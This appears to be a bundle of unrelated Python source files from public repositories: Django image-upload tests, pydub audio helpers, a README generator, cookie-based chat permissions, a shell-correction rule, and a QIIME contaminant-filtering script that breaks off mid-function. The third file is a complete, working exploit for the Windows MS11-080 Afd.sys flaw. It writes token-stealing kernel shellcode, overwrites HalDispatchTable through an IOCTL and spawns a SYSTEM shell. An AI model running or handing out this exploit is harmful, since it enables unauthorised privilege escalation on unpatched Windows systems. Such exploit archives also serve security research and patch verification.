from image_converter.utils.convert_image import convert_image_to_jpeg
__author__ = 'Dominic Dumrauf'
class ViewsTestCase(ImageConversionBaseTestCase):
"""
Tests the 'views'.
"""
def test_upload_get(self):
"""
Tests GETting the form initially.
"""
# Given
c = Client()
# When
response = c.get('/')
# Then
self.assertTemplateUsed(response, template_name='upload.html')
self.assertEqual(response.status_code, 200)
self.assertIn('form', response.context)
def test_upload_post_without_file(self):
"""
Tests POSTing a form which *lacks* a file.
"""
# Given
c = Client()
# When
response = c.post('/')
# Then
self.assertTemplateUsed(response, template_name='upload.html')
self.assertFormError(response, 'form', 'file', 'This field is required.')
self.assertEqual(response.status_code, 200)
self.assertIn('form', response.context)
def test_upload_post_with_non_image_file(self):
"""
Tests POSTing a form which contains a file but the file is not an image.
"""
# Given
c = Client()
# When
with open(self.non_image_file_path) as fp:
response = c.post('/', {'file': fp})
# Then
self.assertTemplateUsed(response, template_name='unsupported_image_file_error.html')
self.assertEqual(response.status_code, 200)
self.assertIn('file', response.context)
self.assertIn(self.non_image_file_name, response.content)
def test_upload_post_with_image_file(self):
"""
Tests POSTing a form which contains a file where the file is an image.
"""
# Given
c = Client()
# When
with open(self.image_file_path) as fp:
response = c.post('/', {'file': fp})
converted_image = convert_image_to_jpeg(fp)
# Then
self.assertEqual(response.status_code, 200)
self.assertEqual(response['Content-Disposition'], 'attachment; filename={0}.jpg'.format(self.image_file_name))
self.assertEqual(response.content, converted_image.getvalue())
@mock.patch('image_converter.views.convert_image_to_jpeg')
def test_unexpected_error_in_image_conversion_handling(self, convert_image_to_jpeg):
"""
Tests POSTing a form where converting the image raises an unexpected exception.
"""
# Given
convert_image_to_jpeg.side_effect = Exception()
c = Client()
# When
with open(self.non_image_file_path) as fp:
response = c.post('/', {'file': fp})
# Then
self.assertTemplateUsed(response, template_name='generic_error.html')
self.assertEqual(response.status_code, 200)
self.assertIn('file', response.context)
self.assertIn(self.non_image_file_name, response.content)
| dumrauf/web_tools | image_converter/tests/test_views.py | Python | mit | 3,078 |
#!/usr/bin/python3
#
# Copyright © 2017 jared <jared@jared-devstation>
#
from pydub import AudioSegment, scipy_effects, effects
import os
import settings, util
# combine two audio samples with a crossfade
def combine_samples(acc, file2, CROSSFADE_DUR=100):
util.debug_print('combining ' + file2)
sample2 = AudioSegment.from_wav(file2)
output = acc.append(sample2, crossfade=CROSSFADE_DUR)
output = effects.normalize(output)
return output
# combine audio samples with crossfade, from within program
def combine_prog_samples(acc, nsamp, CROSSFADE_DUR=100):
output = acc.append(nsamp, crossfade=CROSSFADE_DUR)
return output
# split an audio file into low, mid, high bands
def split_file(fname):
curr_file = AudioSegment.from_file(fname)
low_seg = scipy_effects.low_pass_filter(curr_file, settings.LOW_FREQUENCY_LIM).export(fname + '_low.wav', 'wav')
mid_seg = scipy_effects.band_pass_filter(curr_file, settings.LOW_FREQUENCY_LIM, settings.HIGH_FREQUENCY_LIM).export(fname + '_mid.wav', 'wav')
high_seg = scipy_effects.high_pass_filter(curr_file, settings.HIGH_FREQUENCY_LIM).export(fname + '_high.wav', 'wav')
## add a sample to an existing wav
#def add_sample(fname, samplefile, CROSSFADE_DUR=100):
# new_file = combine_samples(fname, samplefile, CROSSFADE_DUR)[0]
# os.rename(fname, 'old_' + fname)
# os.rename(new_file, fname)
# return new_file[1]
| techlover10/StochasticSoundscape | src/audio.py | Python | mit | 1,411 |
################################################################################
######### MS11-080 - CVE-2011-2005 Afd.sys Privilege Escalation Exploit ########
######### Author: [email protected] - Matteo Memelli ########
######### Spaghetti & Pwnsauce ########
######### yuck! 0xbaadf00d Elwood@mac&cheese.com ########
######### ########
######### Thx to dookie(lifesaver)2000ca, dijital1 and ronin ########
######### for helping out! ########
######### ########
######### To my Master Shifu muts: ########
######### "So that's it, I just need inner peace?" ;) ########
######### ########
######### Exploit tested on the following 32bits systems: ########
######### Win XPSP3 Eng, Win 2K3SP2 Standard/Enterprise Eng ########
################################################################################
from ctypes import (windll, CDLL, Structure, byref, sizeof, POINTER,
c_char, c_short, c_ushort, c_int, c_uint, c_ulong,
c_void_p, c_long, c_char_p)
from ctypes.wintypes import HANDLE, DWORD
import socket, time, os, struct, sys
from optparse import OptionParser
usage = "%prog -O TARGET_OS"
parser = OptionParser(usage=usage)
parser.add_option("-O", "--target-os", type="string",
action="store", dest="target_os",
help="Target OS. Accepted values: XP, 2K3")
(options, args) = parser.parse_args()
OS = options.target_os
if not OS or OS.upper() not in ['XP','2K3']:
parser.print_help()
sys.exit()
OS = OS.upper()
kernel32 = windll.kernel32
ntdll = windll.ntdll
Psapi = windll.Psapi
def findSysBase(drvname=None):
ARRAY_SIZE = 1024
myarray = c_ulong * ARRAY_SIZE
lpImageBase = myarray()
cb = c_int(1024)
lpcbNeeded = c_long()
drivername_size = c_long()
drivername_size.value = 48
Psapi.EnumDeviceDrivers(byref(lpImageBase), cb, byref(lpcbNeeded))
for baseaddy in lpImageBase:
drivername = c_char_p("\x00"*drivername_size.value)
if baseaddy:
Psapi.GetDeviceDriverBaseNameA(baseaddy, drivername,
drivername_size.value)
if drvname:
if drivername.value.lower() == drvname:
print "[+] Retrieving %s info..." % drvname
print "[+] %s base address: %s" % (drvname, hex(baseaddy))
return baseaddy
else:
if drivername.value.lower().find("krnl") !=-1:
print "[+] Retrieving Kernel info..."
print "[+] Kernel version:", drivername.value
print "[+] Kernel base address: %s" % hex(baseaddy)
return (baseaddy, drivername.value)
return None
print "[>] MS11-080 Privilege Escalation Exploit"
print "[>] Matteo Memelli - [email protected]"
print "[>] Release Date 28/11/2011"
WSAGetLastError = windll.Ws2_32.WSAGetLastError
WSAGetLastError.argtypes = ()
WSAGetLastError.restype = c_int
SOCKET = c_int
WSASocket = windll.Ws2_32.WSASocketA
WSASocket.argtypes = (c_int, c_int, c_int, c_void_p, c_uint, DWORD)
WSASocket.restype = SOCKET
closesocket = windll.Ws2_32.closesocket
closesocket.argtypes = (SOCKET,)
closesocket.restype = c_int
connect = windll.Ws2_32.connect
connect.argtypes = (SOCKET, c_void_p, c_int)
connect.restype = c_int
class sockaddr_in(Structure):
_fields_ = [
("sin_family", c_short),
("sin_port", c_ushort),
("sin_addr", c_ulong),
("sin_zero", c_char * 8),
]
## Create our deviceiocontrol socket handle
client = WSASocket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP,
None, 0, 0)
if client == ~0:
raise OSError, "WSASocket: %s" % (WSAGetLastError(),)
try:
addr = sockaddr_in()
addr.sin_family = socket.AF_INET
addr.sin_port = socket.htons(4455)
addr.sin_addr = socket.htonl(0x7f000001) # 127.0.0.1
## We need to connect to a closed port, socket state must be CONNECTING
connect(client, byref(addr), sizeof(addr))
except:
closesocket(client)
raise
baseadd = c_int(0x1001)
MEMRES = (0x1000 | 0x2000)
PAGEEXE = 0x00000040
Zerobits = c_int(0)
RegionSize = c_int(0x1000)
written = c_int(0)
## This will trigger the path to AfdRestartJoin
irpstuff = ("\x41\x41\x41\x41\x42\x42\x42\x42"
"\x00\x00\x00\x00\x44\x44\x44\x44"
"\x01\x00\x00\x00"
"\xe8\x00" + "4" + "\xf0\x00" + "\x45"*231)
## Allocate space for the input buffer
dwStatus = ntdll.NtAllocateVirtualMemory(-1,
byref(baseadd),
0x0,
byref(RegionSize),
MEMRES,
PAGEEXE)
# Copy input buffer to it
kernel32.WriteProcessMemory(-1, 0x1000, irpstuff, 0x100, byref(written))
startPage = c_int(0x00020000)
kernel32.VirtualProtect(startPage, 0x1000, PAGEEXE, byref(written))
################################# KERNEL INFO ##################################
lpDriver = c_char_p()
lpPath = c_char_p()
lpDrvAddress = c_long()
(krnlbase, kernelver) = findSysBase()
hKernel = kernel32.LoadLibraryExA(kernelver, 0, 1)
HalDispatchTable = kernel32.GetProcAddress(hKernel, "HalDispatchTable")
HalDispatchTable -= hKernel
HalDispatchTable += krnlbase
print "[+] HalDispatchTable address:", hex(HalDispatchTable)
halbase = findSysBase("hal.dll")
## WinXP SP3
if OS == "XP":
HaliQuerySystemInformation = halbase+0x16bba # Offset for XPSP3
HalpSetSystemInformation = halbase+0x19436 # Offset for XPSP3
## Win2k3 SP2
else:
HaliQuerySystemInformation = halbase+0x1fa1e # Offset for WIN2K3
HalpSetSystemInformation = halbase+0x21c60 # Offset for WIN2K3
print "[+] HaliQuerySystemInformation address:", hex(HaliQuerySystemInformation)
print "[+] HalpSetSystemInformation address:", hex(HalpSetSystemInformation)
################################# EXPLOITATION #################################
shellcode_address_dep = 0x0002071e
shellcode_address_nodep = 0x000207b8
padding = "\x90"*2
HalDispatchTable0x4 = HalDispatchTable + 0x4
HalDispatchTable0x8 = HalDispatchTable + 0x8
## tokenbkaddr = 0x00020900
if OS == "XP":
_KPROCESS = "\x44"
_TOKEN = "\xc8"
_UPID = "\x84"
_APLINKS = "\x88"
else:
_KPROCESS = "\x38"
_TOKEN = "\xd8"
_UPID = "\x94"
_APLINKS = "\x98"
restore_ptrs = "\x31\xc0" + \
"\xb8" + struct.pack("L", HalpSetSystemInformation) + \
"\xa3" + struct.pack("L", HalDispatchTable0x8) + \
"\xb8" + struct.pack("L", HaliQuerySystemInformation) + \
"\xa3" + struct.pack("L", HalDispatchTable0x4)
tokenstealing = "\x52" +\
"\x53" +\
"\x33\xc0" +\
"\x64\x8b\x80\x24\x01\x00\x00" +\
"\x8b\x40" + _KPROCESS +\
"\x8b\xc8" +\
"\x8b\x98" + _TOKEN + "\x00\x00\x00" +\
"\x89\x1d\x00\x09\x02\x00" +\
"\x8b\x80" + _APLINKS + "\x00\x00\x00" +\
"\x81\xe8" + _APLINKS + "\x00\x00\x00" +\
"\x81\xb8" + _UPID + "\x00\x00\x00\x04\x00\x00\x00" +\
"\x75\xe8" +\
"\x8b\x90" + _TOKEN + "\x00\x00\x00" +\
"\x8b\xc1" +\
"\x89\x90" + _TOKEN + "\x00\x00\x00" +\
"\x5b" +\
"\x5a" +\
"\xc2\x10"
restore_token = "\x52" +\
"\x33\xc0" +\
"\x64\x8b\x80\x24\x01\x00\x00" +\
"\x8b\x40" + _KPROCESS +\
"\x8b\x15\x00\x09\x02\x00" +\
"\x89\x90" + _TOKEN + "\x00\x00\x00" +\
"\x5a" +\
"\xc2\x10"
shellcode = padding + restore_ptrs + tokenstealing
shellcode_size = len(shellcode)
orig_size = shellcode_size
# Write shellcode in userspace (dep)
kernel32.WriteProcessMemory(-1, shellcode_address_dep, shellcode,
shellcode_size, byref(written))
# Write shellcode in userspace *(nodep)
kernel32.WriteProcessMemory(-1, shellcode_address_nodep, shellcode,
shellcode_size, byref(written))
## Trigger Pointer Overwrite
print "[*] Triggering AFDJoinLeaf pointer overwrite..."
IOCTL = 0x000120bb # AFDJoinLeaf
inputbuffer = 0x1004
inputbuffer_size = 0x108
outputbuffer_size = 0x0 # Bypass Probe for Write
outputbuffer = HalDispatchTable0x4 + 0x1 # HalDispatchTable+0x4+1
IoStatusBlock = c_ulong()
NTSTATUS = ntdll.ZwDeviceIoControlFile(client,
None,
None,
None,
byref(IoStatusBlock),
IOCTL,
inputbuffer,
inputbuffer_size,
outputbuffer,
outputbuffer_size
)
## Trigger shellcode
inp = c_ulong()
out = c_ulong()
inp = 0x1337
hola = ntdll.NtQueryIntervalProfile(inp, byref(out))
## Spawn a system shell, w00t!
print "[*] Spawning a SYSTEM shell..."
os.system("cmd.exe /T:C0 /K cd c:\\windows\\system32")
############################## POST EXPLOITATION ###############################
print "[*] Restoring token..."
## Restore the thingie
shellcode = padding + restore_ptrs + restore_token
shellcode_size = len(shellcode)
trail_padding = (orig_size - shellcode_size) * "\x00"
shellcode += trail_padding
shellcode_size += (orig_size - shellcode_size)
## Write restore shellcode in userspace (dep)
kernel32.WriteProcessMemory(-1, shellcode_address_dep, shellcode,
shellcode_size, byref(written))
## Write restore shellcode in userspace (nodep)
kernel32.WriteProcessMemory(-1, shellcode_address_nodep, shellcode,
shellcode_size, byref(written))
## Overwrite HalDispatchTable once again
NTSTATUS = ntdll.ZwDeviceIoControlFile(client,
None,
None,
None,
byref(IoStatusBlock),
IOCTL,
inputbuffer,
inputbuffer_size,
outputbuffer,
outputbuffer_size
)
## Trigger restore shellcode
hola = ntdll.NtQueryIntervalProfile(inp, byref(out))
print "[+] Restore done! Have a nice day :)"
| SecWiki/windows-kernel-exploits | MS11-080/CVE-2011-2005.py | Python | mit | 12,217 |
from pathlib import Path
class MarkdownParser():
def __init__(self, text):
self.text = text
self.lines = text.split('\n')
def title(self):
return self.lines[0].split(' ')[1]
def header(self, name, level, include_header=False):
start = False
end = False
content = []
mark = '#' * level
for line in self.lines:
if start and not end:
end |= (f'{mark} ' in line[:(level + 1)]) and (not f'{mark} {name}' in line)
if end:
start = False
else:
content.append(line)
else:
start = (f'{mark} {name}' in line)
if start:
end = False
if include_header:
content.append(line)
content = '\n'.join(content)
return content
def overview(self):
overview = self.header('Overview', 2)
overview = overview.split('\n')
overview = '\n'.join(overview[1:]) # remove the first line
return overview
def features(self):
return self.header('C++', 2, True)
def combine(text, parsers):
overview = ''
features = ''
title = ''
for p in parsers:
title += p.title().replace('C++', '') + '/'
overview += p.overview() + '\n'
features += p.features() + '\n'
title = title[:-1]
overview = overview.replace('README.md#', '#')
features = features.replace('README.md#', '#')
text = text.replace('# C++\n', f'# C++{title}\n')
text = text.replace(f'<!-- overview -->', overview)
text = text.replace(f'<!-- features -->', features)
return text
def main():
src_dir = Path(__file__).parent
parsers = []
srcs = list(src_dir.glob('CPP*.md'))
srcs.sort(reverse=True)
for file in srcs:
with open(file, 'r') as fp:
text = fp.read()
p = MarkdownParser(text)
parsers.append(p)
template_file = src_dir / 'readme-template.md'
with open(template_file, 'r') as fp:
text = fp.read()
text = combine(text, parsers)
readme_file = src_dir / 'README.md'
with open(readme_file, 'w') as fp:
fp.write(text)
if __name__ == '__main__':
main()
| AnthonyCalandra/modern-cpp-features | auto-generate-readme.py | Python | mit | 2,305 |
import functools
from common.tornado_cookies import get_secure_cookie, generate_secure_cookie
from core import cookies
class Perms(object):
NONE = None
READ = 'r'
WRITE = 'w'
def _permission_level(user, room):
"""
`user`'s permission level on `room`, ignoring cookies
"""
if not user.is_authenticated():
return Perms.READ
else:
return Perms.WRITE
def _get_cached_perm_level(request, cookie_name):
perm = get_secure_cookie(request, cookie_name)
if not perm:
return
assert perm in ('r', 'w')
return perm
def _set_cached_perm_level(response, cookie_name, perm_level):
assert perm_level in ('r', 'w')
cookie_val = generate_secure_cookie(cookie_name, perm_level)
response.set_cookie(cookie_name, cookie_val)
def _perm_level_satisfies(perm_val, perm_req):
"""
If a user has permission level `perm_val`,
and is requesting access level `perm_req`.
"""
if perm_req == perm_val:
return True
if (perm_val == Perms.WRITE) and (perm_req == Perms.READ):
return True
return False
def get_permission(request, response, room, perm_req):
"""
Returns True or False.
Sets a cookie on the response object to cache
the result, if necessary.
"""
assert perm_req in (Perms.READ, Perms.WRITE)
if cookies.has_cached_room_permission(
room.shortname,
perm_req,
functools.partial(get_secure_cookie, request),
session_key=request.session.session_key,
uid=getattr(request.user, 'id', None)):
return True
# Cached permission does not satisfy requirement.
perm_actual = _permission_level(request.user, room)
if perm_actual == Perms.NONE:
return False
assert perm_actual in (Perms.READ, Perms.WRITE)
result = _perm_level_satisfies(perm_actual, perm_req)
cookie_name = cookies.room_cookie_name(room.shortname, session_key=request.session.session_key, uid=getattr(request.user, 'id', None))
if result:
_set_cached_perm_level(response, cookie_name, perm_actual)
return result
| reverie/seddit.com | redditchat/core/permissions.py | Python | mit | 2,122 |
from difflib import get_close_matches
from thefuck.utils import sudo_support, get_all_executables, get_closest
@sudo_support
def match(command, settings):
return 'not found' in command.stderr and \
bool(get_close_matches(command.script.split(' ')[0],
get_all_executables()))
@sudo_support
def get_new_command(command, settings):
old_command = command.script.split(' ')[0]
new_command = get_closest(old_command, get_all_executables())
return ' '.join([new_command] + command.script.split(' ')[1:])
priority = 3000
| mbbill/thefuck | thefuck/rules/no_command.py | Python | mit | 580 |
#!/usr/bin/env python
# File created on 09 Aug 2012
from __future__ import division
__author__ = "Jon Sanders"
__copyright__ = "Copyright 2014, Jon Sanders"
__credits__ = ["Jon Sanders"]
__license__ = "GPL"
__version__ = "1.9.1"
__maintainer__ = "Jon Sanders"
__email__ = "[email protected]"
__status__ = "Development"
from qiime.util import load_qiime_config, parse_command_line_parameters,\
get_options_lookup, make_option
from qiime.parse import parse_qiime_parameters, parse_taxonomy, parse_mapping_file_to_dict
from qiime.filter import sample_ids_from_metadata_description
from bfillings.uclust import get_clusters_from_fasta_filepath
from bfillings.usearch import usearch_qf
from scipy.stats import spearmanr
import os.path
from biom import load_table
import numpy as np
options_lookup = get_options_lookup()
script_info = {}
script_info['brief_description'] = """
A script to filter sequences by potential contaminants"""
script_info['script_description'] = """
This script performs a series of filtering steps on a sequence file with the
intent of removing contaminant sequences. It requires input of an OTU table, a
sample map, an OTU map, a sequence FASTA file, and an output directory.
There are two primary approaches the script can take: (1) comparing sequence
abundances in blank control sequence libraries to those in sample libraries,
where sequences present in blanks are presumed to be contaminants, and (2)
comparing sequences in sample libraries to a database of known contaminants.
In approach (1), OTUs (or unique sequences, if OTU table and map are defined at
100% identity) are tested for their maximum and mean presence in blank and
sample libraries, and excluded if they satisfy the given criteria. For example,
if you want to exclude any sequences whose maximum abundance in a blank sample
is more than 10% the maximum abundance in a sample (maxB > 0.1 * maxS), you
would choose '--removal_stat_blank maxB --removal_stat_sample maxS
--removal_differential 0.1'. For this approach, you must also provide a column
in your mapping file that indicates which samples to use as blanks, and pass
this information to the script with the 'valid states' option (e.g.
'Blank:True')
In approach (2), you must provide a fasta library of putative contaminants.
These may be previously clustered OTUs from the blank samples, commonly
sequenced contaminants (if known), or another fasta file. Sequences will be
clustered against this fasta file using Uclust-Ref, and any that match within
a given percent similarity (using the '-c' or '--contaminant_similarity' option)
will be marked as putative contaminants.
When using approach (2), it is possible to remove 'real' sequences from samples
that just happen to be similar to contaminants. This may be detectable when
using unique sequence OTU tables/maps as input, if the 'real' sequences are
nonetheless slightly different from contaminants. In this case, it may be
desireable to reinstate those unique sequences that are present in samples but
not in blanks. You may do this using criteria of relative abundance (similar to
approach [1], where a sequence is reinstated if its max presence in a sample is
greater than its max presence in a blank, i.e. maxS > X * maxB) or of incidence
in non-blank samples (i.e. reinstated if present in two or more samples). If
both criteria are provided, you must choose to reinstate either the intersection
of the criteria (i.e. BOTH more abundant in samples AND present in 2 or more)
or the union (i.e. EITHER more abundant in samples OR present in 2 or more).
"""
script_info['script_usage'] = []
script_info['script_usage'].append(("""Example:""", """
The following steps are performed by the command below:
1. Calculate max relative abundance of each sequence in samples and blanks
2. Identify sequences whose maximum abunance in blanks is more than 10% their
maximum abundance in samples.
3. Output OTU maps of sequences for which above is true, and for which above is
false.
""", """
decontaminate.py -i unique_seqs_otu_table.biom -o filter_out_dir
-m metadata_mapping_file.txt -f unique_seqs_rep_set.fna
-M unique_seqs_otus.txt -s 'Blank:True' --removal_stat_blank maxB
--removal_stat_sample maxS --removal_differential 0.1
"""))
script_info['output_description'] = """
This script will output a tab-delimited summary table, indicating the relative
abundance stats for each sequence considered, along with its fate at each step
of the process.
It will also output an OTU map for each category of sequences identified (e.g.
those never identified as contaminants, those identified as reference-based
contaminants, those identified as abundance-based contaminants, and those
reinstated). These OTU maps can then be used to filter in the input FASTA file.
Output file naming:
contamination_summary.txt -- tab-delimited per-sequence summary file
assed_otu_map.txt -- OTU map of non-contaminant sequences
ref_contaminants_otu_map.txt -- OTU map of reference contaminant sequences
abund_contaminants_otu_map.txt -- OTU map of abundance contaminant sequences
reinstated_contaminants_otu_map.txt -- OTU map of reinstated sequences
"""
script_info['required_options'] = [
options_lookup["output_dir"]
]
script_info['optional_options'] = [
options_lookup["otu_table_as_primary_input"],
make_option('--mothur_counts_fp',
type='existing_filepath',
help='path to mothur counts table as input'),
options_lookup["mapping_fp"],
make_option('-M', '--otu_map_fp', type="existing_filepath",
help='the input OTU map file'),
make_option('-s',
'--valid_states', type='string',
help="Column header:value pair in mapping file identifying blank samples"),
make_option('--blank_id_fp',
type='existing_filepath',
help='path to file listing blank sample ids'),
options_lookup["input_fasta"],
make_option('--contaminant_db_fp', type="existing_filepath",
help='A FASTA file of potential contaminant sequences'),
make_option('-c', '--contaminant_similarity', type='float', default=0.97,
help=('Sequence similarity threshold for contaminant matches')),
make_option('-r', '--max_correlation', type='float',
help=('Maximum Spearman correlation for contaminant identification')),
make_option('--correlate_header', type='string',
help=('Column header in mapping file with correlation data')),
make_option('--min_relabund_threshold', type="float",
help='discard sequences below this relative abundance threshold'),
make_option('--prescreen_threshold', type="float",
help='prescreen libraries that lose more than this proportion of sequences'),
make_option('--removal_stat_blank', type="choice", choices=["maxB", "avgB"],
help='blank statistic to be used for removal (maxB, avgB)'),
make_option('--removal_stat_sample', type="choice", choices=["maxS", "avgS"],
help='sample statistic to be used for removal (maxS, avgS)'),
make_option('--removal_differential', type="float",
help='differential proportion for removal (maxB > X * maxS)'),
make_option('--reinstatement_stat_blank', type="choice", choices=["maxB", "avgB"],
help='blank statistic to be used for reinstatement (maxB, avgB)'),
make_option('--reinstatement_stat_sample', type="choice", choices=["maxS", "avgS"],
help='sample statistic to be used for reinstatement (maxS, avgS)'),
make_option('--reinstatement_differential', type="float",
help='differential proportion for reinstatement (maxS > X * maxB)'),
make_option('--reinstatement_sample_number', type="int",
help='minimum number of samples necessary for reinstatement'),
make_option('--reinstatement_method', type="choice", choices=["union", "intersection"],
help='method to rectify reinstatement criteria'),
make_option('--drop_lib_threshold', type="float",
help='read loss threshold to drop libraries from output table'),
make_option('--write_filtered_output', action="store_true",
help='write an output table filtered of contaminants'),
make_option('--write_per_library_stats', action="store_true",
help='write a per-library decontamination summary'),
make_option('--write_per_seq_stats', action="store_true",
help='write a per-sequence decontamination summary'),
make_option('--write_per_seq_disposition', action="store_true",
help='write a per-sequence disposition file'),
make_option('--write_output_seq_lists', action="store_true",
help='write separate sequence name lists for each contaminant category')
]
script_info['version'] = __version__
def pick_ref_contaminants(queries, ref_db_fp, input_fasta_fp, contaminant_similarity, output_dir):
# Blast against contaminant DB
clusters, failures, seeds = get_clusters_from_fasta_filepath(
input_fasta_fp,
input_fasta_fp,
percent_ID=contaminant_similarity,
max_accepts=1,
max_rejects=8,
stepwords=8,
word_length=8,
optimal=False,
exact=False,
suppress_sort=False,
output_dir=output_dir,
enable_rev_strand_matching=False,
subject_fasta_filepath=ref_db_fp,
suppress_new_clusters=True,
return_cluster_maps=True,
stable_sort=False,
save_uc_files=True,
HALT_EXEC=False)
# Pick seqs that fail the similarity to contaminants rule
ref_contaminants = set(queries) - set(failures)
return(ref_contaminants)
def pick_corr_contaminants(sample_biom,
corr_data_dict,
max_r):
# Filter biom to only samples for which correlate data available
sample_biom_filt = sample_biom.filter(
lambda val, id_, metadata: id_ in corr_data_dict,
invert=False,
inplace=False)
otus = sample_biom_filt.ids(axis='observation')
samples = sample_biom_filt.ids(axis='sample')
# Make array of correlate data in same order as biom file
correlate = [corr_data_dict[x] for x in samples]
obs_corr_dict = {}
# Make a 2D array of normalized biom table values
norm_array = sample_biom_filt.norm(inplace=False).matrix_data.toarray()
t = 0
for otu in otus:
obs_corr_dict[otu] = spearmanr(norm_array[t], correlate)
t += 1
# get keys (otu names) for OTUs with less than minimum correlation
obs_corr_contaminants = [x for x in obs_corr_dict if obs_corr_dict[x][0] < max_r]
return(set(obs_corr_contaminants), obs_corr_dict)
def reinstate_abund_seqs(putative_contaminants,
contamination_stats_dict,
contamination_stats_header,
reinstatement_stat_sample,
reinstatement_stat_blank,
reinstatement_differential):
abund_reinstated_seqs = compare_blank_abundances(contamination_stats_dict,
contamination_stats_header,
reinstatement_stat_sample,
reinstatement_stat_blank,
reinstatement_differential,
negate=False)
# Only consider seqs as reinstated if previously identified as contaminants
abund_reinstated_seqs = set(putative_contaminants) & set(abund_reinstated_seqs)
return(abund_reinstated_seqs)
def reinstate_incidence_seqs(putative_contaminants,
unique_seq_biom,
blank_sample_ids,
reinstatement_sample_number):
sample_biom = unique_seq_biom.filter(lambda val, id_, metadata:
id_ in blank_sample_ids, invert=True, inplace=False)
incidence_reinstated_seqs = sample_biom.pa().filter(
lambda val, id_, metadata: val.sum() >= reinstatement_sample_number,
axis='observation', inplace=False).ids(
axis='observation')
# Only consider seqs as reinstated if previously identified as contaminants
incidence_reinstated_seqs = set(putative_contaminants) & set(incidence_reinstated_seqs)
return(incidence_reinstated_seqs)
def mothur_counts_to_biom(mothur_fp):
mothur_biom = load_table(mothur_fp)
mothur_biom.type = u'OTU table'
filter_biom = mothur_biom.filter(
lambda val, id_, metadata: id_ in 'total', invert=True)
return(filter_biom)
def biom_to_mothur_counts(biom_obj):
sample_ids = biom_obj.ids(axis='sample')
otu_ids = biom_obj.ids(axis='observation')
otu_totals = biom_obj.sum(axis='observation')
outstring = 'Representative_Sequence\ttotal\t' + '\t'.join(sample_ids) + '\n'
for otu in otu_ids:
otu_data = biom_obj.data(id = otu, axis = 'observation')
outstring += '{0}\t{1}\t{2}\n'.format(otu,
int(otu_data.sum()),
'\t'.join(str(x) for x in otu_data.astype('int')))
return(outstring)
def prescreen_libraries(unique_seq_biom,
blank_sample_ids,
removal_stat_sample,
removal_stat_blank,
removal_differential,
prescreen_threshold):
contamination_stats_header, contamination_stats_dict = \
get_contamination_stats(unique_seq_biom, blank_sample_ids)
abund_contaminants = compare_blank_abundances(contamination_stats_dict,
contamination_stats_header,
removal_stat_sample,
removal_stat_blank,
removal_differential,
negate=True)
# make relabund table
norm_biom = unique_seq_biom.norm(inplace = False)
# filter out sequences marked as contaminants
norm_biom.filter(lambda val, id_, metadata: id_ in abund_contaminants,
axis='observation', invert=True, inplace=True)
# filter out samples above threshold
norm_biom.filter(lambda val, id_, metadata: sum(val) > prescreen_threshold,
axis='sample', invert=False, inplace=True)
# Now only have samples failing the prescreening
above_threshold_samples = norm_biom.ids(axis='sample')
return above_threshold_samples
def get_contamination_stats(biom_file, blank_sample_ids=None, exp_sample_ids=[], proportional=False):
if not proportional:
biom_file = biom_file.norm(inplace=False)
header = ['maxS','avgS']
# Calculate blank stats if blank sample names are provided
if blank_sample_ids:
blanks = True
blank_data = biom_file.filter(blank_sample_ids, axis='sample',
invert=False, inplace=False).matrix_data
maxB = blank_data.max(axis=1).todense().tolist()
avgB = blank_data.mean(axis=1).tolist()
header.append('maxB')
header.append('avgB')
else:
# Otherwise, set the 'blanks' to an empty list
blank_sample_ids = []
blanks = False
# If specific list of experimental sample IDs aren't provided,
# assume everything not marked blank is an experimental sample
if len(exp_sample_ids) == 0:
exp_sample_ids = set(biom_file.ids(axis='sample')) - set(blank_sample_ids)
sample_data = biom_file.filter(exp_sample_ids, axis='sample',
invert=False, inplace=False).matrix_data
maxS = sample_data.max(axis=1).todense().tolist()
avgS = sample_data.mean(axis=1).tolist()
stats_dict = {}
i = 0
if blanks:
for otu in biom_file.ids(axis='observation'):
stats_dict[otu] = [maxS[i][0], avgS[i][0], maxB[i][0], avgB[i][0]]
i += 1
else:
for otu in biom_file.ids(axis='observation'):
stats_dict[otu] = [maxS[i][0], avgS[i][0]]
i += 1
return(header, stats_dict)
def pick_min_relabund_threshold(stats_dict, stats_header, min_relabund, sample_stat='maxS'):
i_s = stats_header.index(sample_stat)
passed_otus = set()
for otu in stats_dict:
if(float(stats_dict[otu][i_s]) < float(min_relabund)):
passed_otus.add(otu)
return(passed_otus)
def compare_blank_abundances(stats_dict, stats_header,
sample_stat, blank_stat, scalar=1, negate=False):
"""Note that this method will default to returning sequences for which
the criteria sample_stat > blank_stat * scalar are TRUE, i.e. non-contam
sequences. To return contaminants (sequences that FAIL the inequality),
set negate to True."""
i_s = stats_header.index(sample_stat)
i_b = stats_header.index(blank_stat)
passed_otus = set()
for otu in stats_dict:
if((float(stats_dict[otu][i_s]) > (float(scalar) * float(stats_dict[otu][i_b]))) != negate):
passed_otus.add(otu)
# print passed_otus
return(passed_otus)
def calc_per_category_decontam_stats(biom_obj, filter_otus):
reads = biom_obj.filter(lambda val, id_, metadata: id_ in filter_otus,
axis='observation', invert=False, inplace=False).sum(axis = 'sample')
otus = biom_obj.pa(inplace = False).filter(lambda val, id_, metadata: id_ in filter_otus,
axis='observation', invert=False, inplace=False).sum(axis = 'sample')
return(reads.tolist(),otus.tolist())
def calc_per_library_decontam_stats(start_biom, output_dict):
# calculate starting number of sequences and unique sequences per library
steps = ['below_relabund_threshold','putative_contaminants','ever_good_seqs','reinstated_seqs','all_good_seqs']
results_dict = {}
results_dict['starting'] = calc_per_category_decontam_stats(start_biom, start_biom.ids(axis='observation'))
results_header = ['starting']
for step in steps:
if step in output_dict:
results_dict[step] = calc_per_category_decontam_stats(start_biom, output_dict[step])
results_header.append(step)
return(results_dict, results_header)
def filter_contaminated_libraries(unique_seq_biom, contaminant_otus, contam_threshold):
# make relabund table
norm_biom = unique_seq_biom.norm(inplace = False)
# filter out sequences marked as contaminants
norm_biom.filter(lambda val, id_, metadata: id_ in contaminant_otus,
axis='observation', invert=True, inplace=True)
# filter out samples above threshold
norm_biom.filter(lambda val, id_, metadata: sum(val) > contam_threshold,
axis='sample', invert=False, inplace=True)
# filter contam sequences from original biom
filtered_biom = unique_seq_biom.filter(lambda val, id_, metadata: id_ in contaminant_otus,
axis='observation', invert=True, inplace=False)
# filter samples that lost too much relative to starting from original biom
filtered_biom = filtered_biom.filter(lambda val, id_, metadata: id_ in norm_biom.ids(axis='sample'),
axis='sample', invert=False, inplace=True)
return(filtered_biom)
def print_filtered_otu_map(input_otu_map_fp, output_otu_map_fp, filter_set):
output_otu_map_f = open(output_otu_map_fp, 'w')
for line in open(input_otu_map_fp, 'U'):
seq_identifier = line.strip().split('\t')[0]
